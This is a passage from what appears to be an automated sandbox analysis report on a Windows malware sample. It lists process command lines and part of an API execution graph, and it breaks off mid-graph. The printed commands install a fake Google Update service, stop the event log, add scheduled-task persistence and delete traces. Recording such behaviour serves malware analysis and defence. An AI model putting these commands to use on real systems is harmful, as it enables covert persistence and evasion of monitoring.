                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:03
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:03
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:04
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:04
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:04
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:04
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:04
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e270000
                                                                                                                                                                                                                                                                                                                                                        File size:11'695'088 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                        • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:05
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\ProgramData\GHDAKKJJJK.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\ProgramData\GHDAKKJJJK.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                        File size:5'842'928 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                        • Detection: 54%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:06
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:06
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:06
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x60000
                                                                                                                                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:07
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\service.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\service.exe
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                        File size:5'842'928 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                        • Detection: 54%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:08
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:08
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:08
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x60000
                                                                                                                                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:10
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:63
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:10
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:64
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:10
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                                                                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                          Function 12E9D50C Relevance: 1.6, Instructions: 1582COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2193590871.0000000012E9A000.00000004.00001000.00020000.00000000.sdmp, Offset: 12E9A000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_12e9a000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3911e8f8f61b251f8453e579cb84c6425213b697149eeba1cfafce01e098e87
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c9a77d3fa91d8726dffc5cf82bab680aed52b4f72e366a2feaba9a76c2a0bb0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3911e8f8f61b251f8453e579cb84c6425213b697149eeba1cfafce01e098e87
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E32846244E3C24FD7538BB48CA56913FB0AE17224B5E45EBC4C1CF0A3E25D599ACB23
                                                                                                                                                                                                                                                                                                                                                          Function 12E9E248 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2193590871.0000000012E9A000.00000004.00001000.00020000.00000000.sdmp, Offset: 12E9A000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_12e9a000_S0FTWARE.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 40e83ebd256b1cf773ab16c6bbc0d11b692495a3d19b7e01b55262bc0a3e11b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4aeef7993aea7b0d10df227e75c61c0c597104a0194ae133a991a554b6c23166
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40e83ebd256b1cf773ab16c6bbc0d11b692495a3d19b7e01b55262bc0a3e11b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651E86A44E3C24FCB434B7848B5191BFB05E1B22435E89DBC5C1CE0B3E15D299AD723

                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:6.1%
                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:2.8%
                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:14
                                                                                                                                                                                                                                                                                                                                                          execution_graph 68198 2a19c8d 68199 2a19c8f 68198->68199 68249 2a02b58 68199->68249 68208 2a01274 25 API calls 68209 2a19cbe 68208->68209 68210 2a01274 25 API calls 68209->68210 68211 2a19cc8 68210->68211 68364 2a0147a GetPEB 68211->68364 68213 2a19cd2 68214 2a01274 25 API calls 68213->68214 68215 2a19cdc 68214->68215 68216 2a01274 25 API calls 68215->68216 68217 2a19ce6 68216->68217 68218 2a01274 25 API calls 68217->68218 68219 2a19cf0 68218->68219 68365 2a01492 GetPEB 68219->68365 68221 2a19cfa 68222 2a01274 25 API calls 68221->68222 68223 2a19d04 68222->68223 68224 2a01274 25 API calls 68223->68224 68225 2a19d0e 68224->68225 68226 2a01274 25 API calls 68225->68226 68227 2a19d18 68226->68227 68366 2a014e9 68227->68366 68230 2a01274 25 API calls 68231 2a19d2c 68230->68231 68232 2a01274 25 API calls 68231->68232 68233 2a19d36 68232->68233 68234 2a01274 25 API calls 68233->68234 68235 2a19d40 68234->68235 68389 2a01656 GetTempPathW 68235->68389 68238 2a01274 25 API calls 68239 2a19d4f 68238->68239 68240 2a01274 25 API calls 68239->68240 68241 2a19d59 68240->68241 68242 2a01274 25 API calls 68241->68242 68243 2a19d63 68242->68243 68401 2a18f92 68243->68401 68629 2a0470c GetProcessHeap RtlAllocateHeap 68249->68629 68252 2a0470c 3 API calls 68253 2a02b80 68252->68253 68254 2a0470c 3 API calls 68253->68254 68255 2a02b98 68254->68255 68256 2a0470c 3 API calls 68255->68256 68257 2a02bae 68256->68257 68258 2a0470c 3 API calls 68257->68258 68259 2a02bc4 68258->68259 68260 2a0470c 3 API calls 68259->68260 68261 2a02bd9 68260->68261 68262 2a0470c 3 API calls 68261->68262 68263 2a02bf2 68262->68263 68264 2a0470c 3 API calls 68263->68264 68265 2a02c08 68264->68265 68266 2a0470c 3 API calls 68265->68266 68267 2a02c1e 68266->68267 68268 2a0470c 3 API calls 68267->68268 68269 2a02c34 68268->68269 68270 2a0470c 3 API calls 68269->68270 68271 2a02c4a 68270->68271 68272 2a0470c 3 API calls 68271->68272 68273 2a02c60 68272->68273 68274 2a0470c 3 API calls 68273->68274 68275 2a02c78 68274->68275 68276 2a0470c 3 API calls 68275->68276 68277 2a02c8e 68276->68277 68278 2a0470c 3 API calls 68277->68278 68279 2a02ca4 68278->68279 68280 2a0470c 3 API calls 68279->68280 68281 2a02cba 68280->68281 68282 2a0470c 3 API calls 68281->68282 68283 2a02cd0 68282->68283 68284 2a0470c 3 API calls 68283->68284 68285 2a02ce6 68284->68285 68286 2a0470c 3 API calls 68285->68286 68287 2a02cff 68286->68287 68288 2a0470c 3 API calls 68287->68288 68289 2a02d15 68288->68289 68290 2a0470c 3 API calls 68289->68290 68291 2a02d2b 68290->68291 68292 2a0470c 3 API calls 68291->68292 68293 2a02d41 68292->68293 68294 2a0470c 3 API calls 68293->68294 68295 2a02d57 68294->68295 68296 2a0470c 3 API calls 68295->68296 68297 2a02d6c 68296->68297 68298 2a0470c 3 API calls 68297->68298 68299 2a02d85 68298->68299 68300 2a0470c 3 API calls 68299->68300 68301 2a02d9b 68300->68301 68302 2a0470c 3 API calls 68301->68302 68303 2a02db1 68302->68303 68304 2a0470c 3 API calls 68303->68304 68305 2a02dc7 68304->68305 68306 2a0470c 3 API calls 68305->68306 68307 2a02ddc 68306->68307 68308 2a0470c 3 API calls 68307->68308 68309 2a02df2 68308->68309 68310 2a0470c 3 API calls 68309->68310 68311 2a02e0b 68310->68311 68312 2a0470c 3 API calls 68311->68312 68313 2a02e21 68312->68313 68314 2a0470c 3 API calls 68313->68314 68315 2a02e37 68314->68315 68316 2a0470c 3 API calls 68315->68316 68317 2a02e4d 68316->68317 68318 2a0470c 3 API calls 68317->68318 68319 2a02e63 68318->68319 68320 2a0470c 3 API calls 68319->68320 68321 2a02e78 68320->68321 68322 2a0470c 3 API calls 68321->68322 68323 2a02e91 68322->68323 68324 2a0470c 3 API calls 68323->68324 68325 2a02ea7 68324->68325 68326 2a0470c 3 API calls 68325->68326 68327 2a02ebd 68326->68327 68328 2a0470c 3 API calls 68327->68328 68329 2a02ed3 68328->68329 68330 2a19e25 68329->68330 68633 2a19d79 GetPEB 68330->68633 68332 2a19e2b 68333 2a1a026 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 68332->68333 68338 2a19e3b 68332->68338 68334 2a1a085 GetProcAddress 68333->68334 68335 2a1a097 68333->68335 68334->68335 68336 2a1a0a0 GetProcAddress GetProcAddress 68335->68336 68337 2a1a0c9 68335->68337 68336->68337 68339 2a1a0d2 GetProcAddress 68337->68339 68340 2a1a0e4 68337->68340 68341 2a19e55 20 API calls 68338->68341 68339->68340 68342 2a1a0ed GetProcAddress 68340->68342 68343 2a1a0ff 68340->68343 68341->68333 68342->68343 68344 2a19ca0 68343->68344 68345 2a1a108 GetProcAddress GetProcAddress 68343->68345 68346 2a010e0 GetCurrentProcess VirtualAllocExNuma 68344->68346 68345->68344 68347 2a01101 ExitProcess 68346->68347 68348 2a01088 VirtualAlloc 68346->68348 68351 2a010a8 _memset 68348->68351 68350 2a010dc 68353 2a01274 68350->68353 68351->68350 68352 2a010c5 VirtualFree 68351->68352 68352->68350 68354 2a0129c _memset 68353->68354 68355 2a012ab 13 API calls 68354->68355 68634 2a128e1 GetProcessHeap RtlAllocateHeap GetComputerNameA 68355->68634 68357 2a013d9 68636 2a1e88c 68357->68636 68361 2a013e4 68361->68208 68362 2a013a9 68362->68357 68363 2a013d2 ExitProcess 68362->68363 68364->68213 68365->68221 68646 2a0149d GetPEB 68366->68646 68369 2a0149d 2 API calls 68370 2a01506 68369->68370 68371 2a0149d 2 API calls 68370->68371 68388 2a01591 68370->68388 68372 2a01519 68371->68372 68373 2a0149d 2 API calls 68372->68373 68372->68388 68374 2a01528 68373->68374 68375 2a0149d 2 API calls 68374->68375 68374->68388 68376 2a01537 68375->68376 68377 2a0149d 2 API calls 68376->68377 68376->68388 68378 2a01546 68377->68378 68379 2a0149d 2 API calls 68378->68379 68378->68388 68380 2a01555 68379->68380 68381 2a0149d 2 API calls 68380->68381 68380->68388 68382 2a01564 68381->68382 68383 2a0149d 2 API calls 68382->68383 68382->68388 68384 2a01573 68383->68384 68385 2a0149d 2 API calls 68384->68385 68384->68388 68386 2a01582 68385->68386 68387 2a0149d 2 API calls 68386->68387 68386->68388 68387->68388 68388->68230 68390 2a01694 wsprintfW 68389->68390 68391 2a017e7 68389->68391 68392 2a016c0 CreateFileW 68390->68392 68393 2a1e88c DName::DName 5 API calls 68391->68393 68392->68391 68394 2a016eb 